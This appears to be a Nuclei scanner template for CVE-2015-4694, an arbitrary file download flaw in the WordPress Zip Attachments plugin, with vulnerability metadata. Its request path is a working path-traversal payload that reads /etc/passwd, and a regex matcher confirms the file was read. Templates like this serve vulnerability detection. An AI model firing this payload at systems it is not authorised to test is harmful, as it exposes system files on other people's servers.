nuclei-templates/cves/2015/CVE-2015-4694.yaml

31 lines
824 B
YAML
Raw Normal View History

2021-10-16 09:44:32 +00:00
id: CVE-2015-4694
info:
name: Zip Attachments <= 1.1.4 - Arbitrary File Download
author: 0x_Akoko
severity: high
2021-10-17 02:33:02 +00:00
description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file.
2021-10-16 09:44:32 +00:00
reference: https://wpscan.com/vulnerability/8047
tags: lfi,wordpress,cve,cve2015,wp-plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.60
cve-id: CVE-2015-4694
cwe-id: CWE-22
2021-10-16 09:44:32 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200